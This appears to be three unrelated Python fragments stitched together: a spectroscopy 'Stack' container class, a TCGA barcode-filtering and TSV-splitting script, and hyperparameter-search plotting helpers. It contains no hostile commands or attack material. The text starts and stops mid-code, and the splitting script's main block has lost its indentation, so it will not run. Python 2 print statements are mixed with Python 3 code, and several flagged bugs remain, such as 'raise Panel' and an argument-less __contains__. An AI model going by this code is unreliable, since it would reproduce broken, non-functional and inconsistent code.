            if keys:
                if not isinstance(keys, Iterable):
                    logger.info('%s constructed from non-iterable... converting '
                                'keys to an iterable' % self.full_name)
                    keys = [keys]
                if len(keys) != len(data):
                    raise ValueError('Length mistmatch: keys and data (%s,%s)'\
                        % (len(keys), len(data)))
            # If keys not passed, generate them
            else:
                # Zipped data ((key, df), (key, df))
                try:
                    keys, data = zip(*data)
                except Exception:
                    keys=self._gen_keys(len(data))
                    if len(keys) > 1:
                        logger.warn("Generating keys %s-%s" % (keys[0], keys[-1]))
                    else:
                        logger.warn("Generating key %s" % keys[0])
            self._data=OrderedDict( [ (key, data[i]) for (i, key)
                                      in enumerate(keys) ])
    @property
    def _address(self):
        """ Property to make easily accesible by multicanvas """
        # Uses object.__repr__ (via super) so the default "<... at 0x...>"
        # form is available even if a subclass overrides __repr__.
        return mem_address(super(Stack, self).__repr__())
    def _gen_keys(self, length):
        """ Return a list of itemlables (item0, item1 etc...) using
        self.itemlabel and a length"""
        logger.debug('Items not found on %s: generating item list' % self.full_name)
        return [self.itemlabel+str(i) for i in range(length)]
    # --------------------
    # Dictionary Interface
    def __getitem__(self, keyslice):
        """ If single name, used dict interface. If slice or integer, uses
        list interface. All results parameterized to key, data pairs, passed
        directly into a new Stack.

        NOTE(review): the positional paths index self._data.items()/keys()
        directly, which requires list-like dict views (Python 2 semantics).
        """
        # Slice as list of strings or int [0, 'foo', 2, 'bar']
        if hasattr(keyslice, '__iter__'):
            tuples_out = []
            for item in keyslice:
                if isinstance(item, str):
                    # Translate a name into its positional index first.
                    item = self._data.keys().index(item)
                tuples_out.append(self._data.items()[item])
        else:
            if isinstance(keyslice, int) or isinstance(keyslice, slice):
                tuples_out = self._data.items()[keyslice]
            else:
                tuples_out = [(keyslice, self._data[keyslice])] #keyslice is name
        # If single item, return TimeSpectra, else, return new Stack
        # Canonical slicing implementaiton; don't change unless good reason
        # Because len() wonky with nested tuples (eg (x,y) and [(x1,y1),(x2,y2)]
        # are both length two, this will work:
        if sum(1 for x in tuples_out) == 2:
            return tuples_out[1] #Return timespectra
        else:
            return self.__class__(tuples_out)
    def __delitem__(self, keyslice):
        """ Delete a single name, or a keyslice from names/canvas """
        if isinstance(keyslice, str):
            idx = self.names.index(keyslice)
            self.pop(idx)
        else:
            raise NotImplementedError("Deletion only supports single entry")
    def __setitem__(self, name, canvas):
        """Replace an existing item in place (preserving its position) or
        append a new name.

        NOTE(review): relies on self.names/self.pop/self.insert, which are
        resolved through __getattr__ against the underlying dict -- confirm
        these exist for the stored container type.
        """
        if name in self.names:
            idx = self.names.index(name)
            self.pop(idx)
            self.insert(idx, name, canvas)
        else:
            self.names.append(name)
    def __getattr__(self, attr):
        """ If attribute not found, try attribute lookup in dictionary. If
        that is not found, try finding attribute on self._data.
        For example, self.keys() will first look for self['keys']. Since
        this isn't found, it calls self._data.keys(). But if I do
        self.Item1, then it returns self['Item1']. The very rare conflict
        case that a user has named the items a method that may already exist
        in the dictionary (eg items=['a','b','keys'] is addressed.
        """
        if attr in self._data.keys():
            if hasattr(self._data, attr):
                raise AttributeError('"%s attribute" found in both the items\
                and as a method of the underlying dictionary object.'%(attr))
            else:
                return self[attr]
        return getattr(self._data, attr)
    # Attributes deferred to self.data /dictionary
    def __len__(self):
        return self._data.__len__()
    def __iter__(self):
        return self._data.__iter__()
    def __reversed__(self):
        return self._data.__reversed__()
    def __contains__(self):
        # NOTE(review): __contains__ should accept the probed item as an
        # argument; as written, any 'x in stack' test raises TypeError.
        return self._data.__contains__()
    def as_3d(self):
        """ Return 3d structure of data. Default is panel."""
        # NOTE(review): 'raise' looks like it should be 'return', and Panel
        # is not defined/imported in this module -- confirm intent.
        raise Panel(data=self._data)
    ### Data types without labels
    #Is this realy necessary? See pyparty.ParticleManger for possibly more consistent implementation
    def get_all(self, attr, astype=tuple):
        """Generator/tuple etc.. of (item, attribute) pairs. """
        return put._parse_generator(
            ((item[0], getattr(item[1], attr)) for item in self.items()), astype)
    def _get_unique(self, attr):
        """ Inspects Stack itemwise for an attribute for unique values.
        If non-unique value for the attributes are found, returns
        "mixed".
        """
        unique = set(self.get_all(attr, astype=dict).values())
        if len(unique) > 1:
            return 'mixed'
        else:
            return tuple(unique)[0] #set doesn't support indexing
    def set_all(self, attr, val, inplace=False):
        """ Set attributes itemwise.
        If not inplace, returns new instance of self"""
        if inplace:
            for (key, item) in self.items():
                try:
                    setattr(item, attr, val)
                except Exception as E:
                    raise Exception('Could not set %s in "%s". Received the following \
exception:\n "%s"'%(attr, key, E))
        else:
            out=deepcopy(self._data) #DEEPCOPY
            for item in out:
                setattr(out[item], attr, val)
            return self.__class__(out)
    def apply(self, func, *args, **kwargs):
        """ Applies a user-passed function, or calls an instance method itemwise.
        Parameters:
        -----------
        func: str or function
            If string, must correspond to a method on the object stored
            itemwise in the stack. If a function, appliked itemwise to
            objects stored.
        inplace: False
            Special kwarg. If true, self._data modified inplace,
            otherwise new specstack is returned.
        *args, **kwargs:
            func arguments.
        Returns:
        --------
        If not inplace, returns SpecStack after itemwise application.
        """
        inplace=kwargs.pop('inplace', False)
        # NOTE(review): 'basestring' is Python 2 only; use str under py3.
        if isinstance(func, basestring):
            if inplace:
                for item in self:
                    self[item] = getattr(self[item], func)(*args, **kwargs)
            else:
                return self.__class__(OrderedDict([(k, getattr(v, func)(*args, \
                    **kwargs)) for k,v in self.items()]))
        # function, numpyfunction etc...
        else:
            if inplace:
                for item in self:
                    self[item] = self[item].apply(func)(*args, **kwargs)
            else:
                return self.__class__(OrderedDict([(k, v.apply(func, *args, \
                    **kwargs)) for k,v in self.items()]))
    @property
    def full_name(self):
        """ Timespectra:name or Timespectra:unnamed. Useful for scripts mostly """
        # NOTE(review): 'outname' (with the 'unnamed' fallback) is computed
        # but self.name is used below -- the fallback never applies.
        outname = getattr(self, 'name', 'unnamed')
        return '%s:%s' % (self.__class__.__name__, self.name)
    #def __repr__(self):
    #""" """
@logclass(log_name=__name__)
class SpecStack(Stack):
    """ Stack for just storing timespectra objects.

    Adds spectroscopy-specific conveniences on top of Stack: itemwise
    unit properties (specunit/iunit/reference/varunit) that report 'mixed'
    when items disagree, conversion to a SpecPanel, and a multiplot helper.
    """
    # Auto-generated keys become spec_0, spec_1, ...
    itemlabel='spec_'
    def as_3d(self, **kwargs):
        """ Returns a 3d stack (SpecPanel) of the currently stored items.
        Additional kwargs can be passed directly to SpecPanel constructor."""
        # Imported lazily to avoid a circular import at module load time.
        from specpanel import SpecPanel
        return SpecPanel(data=self._data, **kwargs)
    ### Special properties for swift, in-place attribute overwrites of most
    ### common itemwise operation.  Getter only tests for uniqueness
    @property
    def specunit(self):
        # 'mixed' if the stored spectra disagree on their spectral unit.
        return self._get_unique('specunit')
    ### Do I want to make as a _set method to avoid accidental overwrite?
    @specunit.setter
    def specunit(self, unit):
        """ Sets specunit for every stored TimeSpectra."""
        self.set_all('specunit', unit, inplace=True)
    @property
    def iunit(self):
        return self._get_unique('iunit')
    @iunit.setter
    def iunit(self, unit):
        """ Sets iunit for every stored TimeSpectra."""
        self.set_all('iunit', unit, inplace=True)
    @property
    def reference(self):
        return self._get_unique('reference')
    @reference.setter
    def reference(self, ref):
        """ Set reference itemwise.  No getter, use get_all() instead."""
        self.set_all('reference', ref, inplace=True)
    ### This shouldn't have a setter
    @property
    def varunit(self):
        return self._get_unique('varunit')
    def plot(self, *plotargs, **plotkwargs):
        """Returns multiplot of current stack.

        Notes
        -----
        Wraps skspec.plotting.multiplots.slice_plot()
        """
        # Default the figure title to this stack's name unless overridden.
        plotkwargs.setdefault('title', self.name)
        if 'cbar' in plotkwargs:
            raise NotImplementedError("Colorbar on stack plot not yet supported")
        return slice_plot(self.values(), *plotargs, names=self.keys(), **plotkwargs)
#def __repr__(self):
#outstring = "%s (%s) %s: " % \
#(self.__class__.__name__, self._address, 'what goes here')
#Ln = len(self)
#if Ln == 0:
#outstring += 'EMPTY'
#elif Ln >= MAXOUT:
#outstring += '%s canvii (%s ... %s)' % \
#(Ln, self.names[0], self.names[-1])
#else:
#SEP_CHARACTER = | |
<reponame>cancerregulome/gidget
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
import miscTCGA
import tsvIO
import random
import sys
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
NA_VALUE = -999999
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# the input is a data dictionary which should have 4 keys:
# 'dataType' single string, eg 'GEXP'
# 'rowLabels' vector of feature labels
# 'colLabels' vector of column (sample) labels
# 'dataMatrix' matrix of values
# the output is a data dictionary with the same # of rows, but some columns
# may have been removed if they do not represent tumor samples ... also the
# TCGA barcodes are stripped down to the point where they uniquely identify
# tumor samples
#
# FIXME: this should be modified to take a list of rows or columns to remove
# and then return a new dataD ... (put that into tsvIO???)
def removeNonTumorSamples(dataD):
    """Drop columns whose TCGA barcodes are not tumor samples and shorten
    the surviving barcodes to sample-level codes.

    dataD is the usual data dictionary with 'dataType', 'rowLabels',
    'colLabels' and 'dataMatrix' keys. Columns with barcodes shorter than
    16 characters are kept as-is; longer barcodes are parsed and kept only
    when the sample field is in 01..09 (TCGA tumor sample types). Duplicate
    sample-level codes keep only the first occurrence. Returns the filtered
    data dictionary with 'colLabels' replaced by the shortened codes.
    (Python 2 module: print statements throughout.)
    """
    ## miscTCGA.lookAtBarcodes ( dataD['colLabels'] )
    numCol = len(dataD['colLabels'])
    keepCols = [0] * numCol          # 1 = keep this column
    tumorList = []                   # shortened, de-duplicated tumor barcodes
    numOutCol = 0
    for jj in range(numCol):
        aCode = dataD['colLabels'][jj]
        tumorCode = ''
        # if the barcode is not even long enough to specify the sample type,
        # we will just assume that we keep it ...
        if (len(aCode) < 16):
            tumorCode = aCode
        else:
            # if the barcode is at least 16 characters long, then we parse it
            # ...
            aCode = miscTCGA.fixTCGAbarcode(aCode)
            (site, patient, sample, vial, portion, analyte,
             plate, center) = miscTCGA.parseTCGAbarcode(aCode)
            try:
                iSample = int(sample)
            except:
                iSample = -1
                # NOTE(review): this sanity check compares the 2-char sample
                # field to the whole barcode -- confirm the intended test.
                if (sample != aCode):
                    print " what is going on here ??? ", aCode
                    sys.exit(-1)
            # sample codes 01-09 denote tumor samples in TCGA barcodes
            if (iSample > 0 and iSample < 10):
                tumorCode = miscTCGA.sampleLevelCode(aCode)
        if (tumorCode != ''):
            if (tumorCode not in tumorList):
                tumorList += [tumorCode]
                keepCols[jj] = 1
                numOutCol += 1
            else:
                print " WARNING: in removeNonTumorSamples ... multiple columns for the same tumor sample ??? "
                print aCode, tumorCode
                # print tumorList
                print " --> keeping only the first one "
                # sys.exit(-1)
    rmColList = []
    for jj in range(numCol):
        if (keepCols[jj] == 0):
            rmColList += [jj]
            print " will remove sample <%s> " % dataD['colLabels'][jj]
    # filter out the columns we don't want ...
    dataD = tsvIO.filter_dataMatrix(dataD, [], rmColList)
    print " back from filter_dataMatrix ... ", dataD['colLabels'][:5]
    # NOTE: this next bit may no longer be necessary ...
    # and also set the shortened TCGA barcodes as labels ...
    if (len(tumorList) != len(dataD['dataMatrix'][0])):
        print " ERROR !!! length of tumorList does not correspond to size of dataMatrix !!! "
        print len(tumorList)
        tsvIO.lookAtDataD(dataD)
        sys.exit(-1)
    dataD['colLabels'] = tumorList
    print " now using shortened barcodes .. ", dataD['colLabels'][:5]
    return (dataD)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def dropSampleTypeFromBarcodes(dataD):
    """Truncate each column barcode to its 12-character patient-level form
    (TCGA-XX-YYYY), modifying dataD['colLabels'] in place.

    Warns (but keeps both columns) when two barcodes collapse to the same
    patient code. Returns the same dataD.
    """
    ## miscTCGA.lookAtBarcodes ( dataD['colLabels'] )
    numCol = len(dataD['colLabels'])
    codeList = []
    for jj in range(numCol):
        aCode = dataD['colLabels'][jj]
        # Compare the barcode's *length* to 12 -- the original compared the
        # string itself to the int 12, which is always True on Python 2 and
        # a TypeError on Python 3.
        if (len(aCode) > 12):
            aCode = aCode[:12]
        dataD['colLabels'][jj] = aCode
        if (aCode not in codeList):
            codeList += [aCode]
        else:
            print(" WARNING in dropSampleTypeFromBarcodes ... duplicates ??? %s" % aCode)
    # print codeList
    # sys.exit(-1)
    return (dataD)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def intersectLists(aList, bList):
    """Return the elements of aList that also occur in bList, preserving
    aList's order (duplicates in aList are kept)."""
    return [element for element in aList if (element in bList)]
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def unionLists(aList, bList):
    """Append to aList (in place) every element of bList not already
    present, then return aList."""
    for element in bList:
        if element not in aList:
            aList.append(element)
    return aList
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getMappingVector(unionLabels, curLabels):
    """Map each label in curLabels to its index in unionLabels.

    TCGA barcodes are first shortened to their sample-level form so they
    match the union's representation. Exits the program if any label is
    missing from unionLabels. Returns a list (len(curLabels)) of indices
    into unionLabels. (Python 2 module: print statements throughout.)
    """
    mapVec = [-1] * len(curLabels)
    for ii in range(len(curLabels)):
        aLabel = curLabels[ii]
        # normalize TCGA barcodes to sample-level codes before lookup
        if (aLabel.startswith("TCGA-")):
            aLabel = miscTCGA.sampleLevelCode(aLabel)
        try:
            jj = unionLabels.index(aLabel)
            mapVec[ii] = jj
        except:
            print " ERROR ... did not find <%s> in union labels ... " % aLabel
            print unionLabels
            sys.exit(-1)
    print " mapping vector from %d into %d ... " % (len(curLabels), len(unionLabels))
    print " ", mapVec[:20]
    # print curLabels[:20]
    # print unionLabels[:20]
    print " "
    return (mapVec)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def makeDataTypeString(dTypeList, fTypeList):
    """Combine data-type and feature-type labels into one prefix string,
    e.g. 'N:GEXP:GEXP' or 'M:GEXP+CNVR' ('M:MISC' short-circuits)."""
    # print " in makeDataTypeString ... "
    if ("MISC" in fTypeList):
        return ("M:MISC")
    # A single data type keeps its own prefix; mixed types collapse to "M".
    prefix = dTypeList[0] if (len(dTypeList) == 1) else "M"
    outString = prefix + ":"
    for featureType in fTypeList:
        if (outString[-1] != ":"):
            outString += "+"
        outString += featureType
    print(" output data type string : <%s> " % outString)
    return (outString)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def readSampleListFromFile(sampleFile):
    """Read sample identifiers (one per line, whitespace-stripped) from
    *sampleFile* and return them as a list.

    Uses open() in a 'with' block: the py2-only file() builtin does not
    exist on Python 3, and the original never closed the handle.
    """
    sampleList = []
    with open(sampleFile) as fh:
        for aLine in fh:
            sampleList += [aLine.strip()]
    return (sampleList)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def createOutputFileName ( inFile, rowLabel, aCat ):
    ## Derive an output file name for the subset of inFile that matches the
    ## category aCat.  When aCat alone is too generic to be informative
    ## (e.g. "YES", "T2", "...PRIMARY"), part of the feature name taken from
    ## rowLabel (colon-delimited) is folded into the name as well.
    genericCats = [ "0", "1", "NO", "YES", "FALSE", "TRUE", "MUT", "WT",
                    "ALIVE", "DEAD", "MALE", "FEMALE" ]
    uCat = str(aCat).upper()
    useFeatureName = ( uCat in genericCats )
    ## two-character stage-style codes like T2 / N0 / M1 / C3 are generic too
    if ( len(uCat) == 2 and uCat[0] in "TNMC" ):
        try:
            int(uCat[1])
            useFeatureName = 1
        except ValueError:
            pass
    if ( uCat.find("PRIMARY") > 0 ): useFeatureName = 1
    if ( uCat.find("METASTA") > 0 ): useFeatureName = 1
    if ( not useFeatureName ):
        nameStr = ''
    else:
        tokenList = rowLabel.split(':')
        featName = tokenList[2]
        if ( featName.startswith("I(") ):
            ## indicator features look like I(name|rest) or I(a,b)
            featName = featName[2:-1]
            barPos = featName.find("|")
            if ( barPos > 0 ): featName = featName[:barPos]
            commaPos = featName.find(",")
            if ( commaPos > 0 ):
                featName = featName[:commaPos] + "_vs_" + featName[commaPos+1:]
        nameStr = featName + "_"
        try:
            ## token #7 (when present and non-empty) further qualifies the name
            if ( len(tokenList[7]) > 0 ):
                nameStr += tokenList[7] + "_"
        except IndexError:
            pass
        nameStr += "_"
    if (inFile.endswith(".tsv")):
        stem = inFile[:-4]
    else:
        stem = inFile
    return ( stem + "." + nameStr + str(aCat) + ".tsv" )
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
if __name__ == "__main__":
if (1):
# there must be exactly 3 arguments ...
if (len(sys.argv) != 3):
print " Usage : %s <input file> <categorical feature> " % sys.argv[0]
print " ERROR -- bad command line arguments "
sys.exit(-1)
inFile = sys.argv[1]
catFeature = sys.argv[2]
print " "
print " ***************************************************************** "
print " calling readTSV ... ", inFile
dataD = tsvIO.readTSV(inFile)
if (dataD == {}):
print " --> file does not exist or is empty "
sys.exit(-1)
tsvIO.lookAtDataD(dataD)
# make sure that we can find the specified feature ...
try:
rowLabels = dataD['rowLabels']
colLabels = dataD['colLabels']
except:
print " ERROR in splitTSVbyCat ??? "
sys.exit(-1)
numRow = len(rowLabels)
numCol = len(colLabels)
if (catFeature != "random"):
foundList = []
for iR in range(numRow):
if (rowLabels[iR].find(catFeature) >= 0):
foundList += [iR]
if (len(foundList) == 0):
print " ERROR ??? could not find specified feature ??? ", catFeature
sys.exit(-1)
elif (len(foundList) > 1):
if (1):
print " found several matches ... choosing shortest one "
strLen = 999999
for iR in foundList:
if (len(rowLabels[iR]) < strLen):
strLen = len(rowLabels[iR])
jR = iR
print " --> %s " % rowLabels[jR]
foundList = [jR]
else:
print " ERROR ??? found too many matches ??? ", catFeature
for iR in foundList:
print rowLabels[iR]
sys.exit(-1)
iR = foundList[0]
if (rowLabels[iR].startswith("N:")):
print " ERROR ??? splitting should be done on a categorical (or binary) feature ! "
sys.exit(-1)
catVec = [0] * numCol
catUnq = []
for iC in range(numCol):
catVec[iC] = dataD['dataMatrix'][iR][iC]
if (catVec[iC] not in catUnq):
catUnq += [catVec[iC]]
catUnq.sort()
print catUnq
else:
# for random splitting, use two arbitrary labels
catUnq = ["r0", "r1"]
catVec = [0] * numCol
num0 = 0
num1 = 0
for iC in range(numCol):
iRand = random.randint(0, 1)
catVec[iC] = catUnq[iRand]
if (iRand == 0):
num0 += 1
if (iRand == 1):
num1 += 1
print " --> generated random labels ... %d %d " % (num0, num1)
# now we need to filter the matrix for each of the categories ...
for aCat in catUnq:
if (aCat == "NA"):
continue
print " "
print " "
print " handling ", aCat
rmColList = []
for iC in range(numCol):
if (catVec[iC] != aCat):
rmColList += [iC]
numRm = len(rmColList)
numKp = numCol - numRm
if (numKp < 10):
print " --> too few columns remaining ... skipping this category ... (%d) " % numKp
else:
outD = tsvIO.filter_dataMatrix(dataD, [], rmColList)
# make sure that we are not left with any features that are all-NA | |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Hyperopt plotting utilities.
"""
import os
import csv
import ipdb
import json
import pandas as pd
import pickle as pkl
from collections import defaultdict
import numpy as np
import scipy.ndimage
from matplotlib import ticker
import matplotlib.pyplot as plt
import matplotlib.ticker as tick
import matplotlib.colors as colors
from matplotlib.ticker import MultipleLocator
import seaborn as sns
sns.set_style('white')
sns.set_palette('bright')
def reformat_large_tick_values(tick_val, pos):
  """Compact matplotlib tick formatter: 4500 -> '4.5K', 4000 -> '4K',
  2.5e6 -> '2.5M', 3e9 -> '3B'.  Values below 1000 are rounded to one
  decimal place.  `pos` is unused (FuncFormatter signature).
  """
  suffixes = ((1000000000, 'B'), (1000000, 'M'), (1000, 'K'))
  formatted = None
  for limit, suffix in suffixes:
    if tick_val >= limit:
      formatted = '{:}{}'.format(round(tick_val / limit, 1), suffix)
      break
  if formatted is None:
    if tick_val < 1000:
      formatted = round(tick_val, 1)
    else:
      # unreachable for ordinary numbers; preserved for NaN-like inputs
      formatted = tick_val
  formatted = str(formatted)
  # drop a redundant trailing zero after the decimal: '4.0M' -> '4M'
  dot = formatted.find(".")
  if dot != -1 and formatted[dot + 1] == "0":
    formatted = formatted[:dot] + formatted[dot + 2:]
  return formatted
def load_log(exp_dir, fname='train_log.csv'):
  """Load a CSV training log into a dict of column name -> list of values.

  Iteration-counter columns ('global_iteration', 'iteration', 'epoch') are
  parsed as ints, everything else as floats.  Cells that cannot be parsed
  (e.g. text or missing values) are silently skipped, so columns may end up
  shorter than the number of rows.

  Args:
    exp_dir: directory containing the log file.
    fname: log file name within exp_dir.

  Returns:
    A defaultdict(list) mapping each parseable column to its values.
  """
  result_dict = defaultdict(list)
  with open(os.path.join(exp_dir, fname), newline='') as csvfile:
    reader = csv.DictReader(csvfile)
    for row in reader:
      for key in row:
        try:
          if key in ['global_iteration', 'iteration', 'epoch']:
            result_dict[key].append(int(row[key]))
          else:
            result_dict[key].append(float(row[key]))
        except (ValueError, TypeError):
          # Fix: was a bare `except:`.  int()/float() raise ValueError on a
          # bad string and TypeError on a missing (None) cell; a bare except
          # would also swallow KeyboardInterrupt/SystemExit.
          pass
  return result_dict
def print_best_thetas(log,
                      key='train_loss',
                      print_keys=['train_sum_loss', 'train_loss', 'val_loss', 'train_acc', 'val_acc'],
                      top_k=1,
                      reverse=False,
                      constrained=True):
  # Print the top_k entries of `log` ranked by log[key] (ascending, or
  # descending when reverse=True), showing each metric in print_keys.
  # NOTE(review): `theta_key` is computed below but never used -- looks like
  # copy-paste from get_best_theta; the theta values are never printed.
  # NOTE(review): the mutable list default for print_keys is harmless only
  # because it is never mutated.
  sorted_idxs = np.argsort(log[key])
  if reverse:
    sorted_idxs = list(reversed(sorted_idxs))
  if constrained:
    theta_key = 'thetas_constrained'
  else:
    theta_key = 'thetas'
  for k, idx in enumerate(sorted_idxs[:top_k]):
    print('{} Top {}: {}'.format(key, k, log[key][idx]))
    for print_key in print_keys:
      print('{}: {:5.3f}'.format(print_key, log[print_key][idx]))
      print(' ')
  print('\n')
def print_best_thetas_for_keys(log,
                               keys=['train_sum_loss', 'train_loss', 'val_loss', 'train_acc', 'val_acc'],
                               top_k=1,
                               constrained=True):
  """For each metric in `keys`, print the top_k log entries ranked by that
  metric; accuracy metrics rank descending, losses ascending."""
  for metric in keys:
    descending = 'acc' in metric
    print_best_thetas(log, key=metric, print_keys=keys, top_k=top_k,
                      reverse=descending, constrained=constrained)
def plot_hist(directory, key, ax=None, bins=60, min_value=None, max_value=None, yscale='linear'):
  # Histogram of random-search objective values for `key` found under
  # `directory`.  Draws into `ax` when given, otherwise into a new figure.
  # NOTE(review): get_all_random_search_values is not defined in this
  # module's visible scope -- presumably imported/defined elsewhere; confirm.
  rs_values = get_all_random_search_values(directory, key=key)
  # NOTE(review): falsy checks mean an explicit bound of 0 is treated as
  # "unset" and replaced by the data min/max.
  if not max_value:
    max_value = np.nanmax(rs_values)
  if not min_value:
    min_value = np.nanmin(rs_values)
  if ax:
    plt.sca(ax)
  else:
    plt.figure()
  plt.hist([value for value in np.sort(rs_values) if (value >= min_value) and (value <= max_value)], bins=bins)
  plt.xticks(fontsize=18)
  plt.yticks(fontsize=18)
  plt.yscale(yscale)
  plt.xlabel('Objective Value', fontsize=20)
  plt.ylabel('Count', fontsize=20)
  plt.title(key, fontsize=20)
def get_best_theta(log, key='train_losses', top_k=1, reverse=False, constrained=True):
  """Return (best_theta, value_at_best_theta, sorted_idxs) for metric log[key].

  Entries are ranked ascending by log[key] unless reverse=True.  The theta is
  read from 'thetas_constrained' unless constrained=False, in which case the
  raw 'thetas' are used.  `top_k` is kept for interface compatibility but
  only the single best entry is returned.
  """
  order = np.argsort(log[key])
  if reverse:
    order = list(reversed(order))
  theta_source = 'thetas_constrained' if constrained else 'thetas'
  best_idx = order[0]
  return log[theta_source][best_idx], log[key][best_idx], order
def make_dataframe(result):
  """Summarize a search-result dict as a pandas DataFrame.

  Thetas are rendered as comma-separated '%5.2f' strings; the metric columns
  are copied through unchanged.
  """
  metric_cols = ['train_accs', 'val_accs', 'train_losses', 'val_losses',
                 'trajectory_sums']
  summary = {'thetas': [', '.join('{:5.2f}'.format(v) for v in theta)
                        for theta in result['thetas']]}
  for col in metric_cols:
    summary[col] = result[col]
  # summary['train_cost'] = result['train_cost']  (disabled upstream)
  return pd.DataFrame.from_dict(summary, orient='index').transpose()
def make_theta_dicts(result):
  """Collect the best theta and its objective value under several criteria.

  Bug fix: get_best_theta returns a 3-tuple (theta, value, sorted_idxs); the
  original 2-name unpacking raised ValueError on every call.  The third
  element is discarded here.

  Args:
    result: search-result dict holding 'trajectory_sums', 'train_losses',
      'val_losses', 'train_accs', 'val_accs', and the theta arrays that
      get_best_theta reads.

  Returns:
    (best_theta_dict, value_at_best_theta_dict), both keyed by criterion name.
  """
  # (output label, log key, reverse) -- accuracies rank descending
  criteria = [('F_sum', 'trajectory_sums', False),
              ('full_train_loss', 'train_losses', False),
              ('full_val_loss', 'val_losses', False),
              ('full_train_acc', 'train_accs', True),
              ('full_val_acc', 'val_accs', True)]
  best_theta_dict = {}
  value_at_best_theta_dict = {}
  for label, key, reverse in criteria:
    theta, value, _ = get_best_theta(result, key=key, reverse=reverse)
    best_theta_dict[label] = theta
    value_at_best_theta_dict[label] = value
  return best_theta_dict, value_at_best_theta_dict
def plot_heatmap(pkl_path, xlabel, ylabel, title='', key='train_sum_loss', cmap=plt.cm.gray, levels=10, figsize=(10,8)):
  # Load a pickled 2D hyperparameter sweep and draw a smoothed, clipped
  # filled-contour heatmap of result[key] over the (xv, yv) grid.
  # Assumes result[key] is a numpy array of len(thetas) values that reshapes
  # into a square grid -- TODO confirm against the sweep writer.
  with open(pkl_path, 'rb') as f:
    result = pkl.load(f)
  side_length = int(np.sqrt(len(result['thetas'])))
  # grid_data = result[key]
  grid_data = result[key].reshape(side_length, side_length)
  # NOTE(review): vmin is computed but never used.
  vmin = np.nanmin(grid_data)
  vmax = np.nanmax(grid_data)
  xv, yv = result['xv'], result['yv']
  # clip the color range for loss surfaces so outliers don't wash out detail
  if key in ['F_grid_train_loss', 'F_grid_val_loss'] and (vmax > 3):
    vmax = 3
  elif key == 'train_sum_loss':
    vmax = 1e4
  # NaNs and outliers are saturated at vmax (mutates the loaded array)
  grid_data[np.isnan(grid_data)] = vmax
  grid_data[grid_data > vmax] = vmax
  smoothed_F_grid = scipy.ndimage.gaussian_filter(grid_data, sigma=1.0)
  plt.figure(figsize=figsize)
  # loss surfaces are shown in log space
  if key in ['F_grid_train_loss', 'F_grid_val_loss', 'train_sum_loss']:
    smoothed_F_grid = np.log(smoothed_F_grid)
  if 'acc' in key:
    # fixed high-accuracy contour levels for accuracy surfaces
    # levels = [0, 0.5, 0.6, 0.7, 0.8, 0.85, 0.9, 0.95, 0.97, 0.98, 0.99]
    levels = [0.9, 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98, 0.99, 1.0]
    contour_cmap = plt.cm.get_cmap(cmap, len(levels)+1)
    CS = plt.contourf(yv, xv, smoothed_F_grid.T, levels=levels, cmap=contour_cmap)
    print(CS.levels)
    cbar = plt.colorbar(CS, boundaries=levels)
    cbar.ax.tick_params(labelsize=16)
  else:
    contour_cmap = plt.cm.get_cmap(cmap, levels+1)
    CS = plt.contourf(yv, xv, smoothed_F_grid.T, levels=levels, cmap=contour_cmap)
    cbar = plt.colorbar(CS)
    cbar.ax.tick_params(labelsize=16)
  plt.xticks(fontsize=18)
  plt.yticks(fontsize=18)
  plt.xlabel(xlabel, fontsize=20)
  plt.ylabel(ylabel, fontsize=20)
  plt.title(title, fontsize=24)
def plot_hparams(log,
                 keys,
                 inner_problem_len=200,
                 xkey='inner_problem_steps',
                 plot_inner_problem_ticks=False,
                 xlim=None,
                 xtick_locs=None,
                 xtick_labels=None,
                 xscale='linear',
                 yscale='linear',
                 xlabel='Inner Iteration',
                 ylabel='Hyperparameter Value',
                 show_legend=True,
                 legend_outside=True):
  # Plot hyperparameter trajectories log[key] vs log[xkey] for each key.
  # Values are transformed by log10(exp(x)), i.e. converted from natural-log
  # space to base-10 log space (equals x / ln 10).
  plt.figure(figsize=(8,5))
  colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
  for i, key in enumerate(keys):
    # earlier variant read from log['result_dict'] and drew markers:
    # plt.plot(log['result_dict'][xkey], np.log10(np.exp(np.array(log['result_dict'][key]))),
    #          label='{}'.format(key), color=colors[i % len(colors)], marker='o', linewidth=2, linestyle='-')
    plt.plot(log[xkey], np.log10(np.exp(np.array(log[key]))),
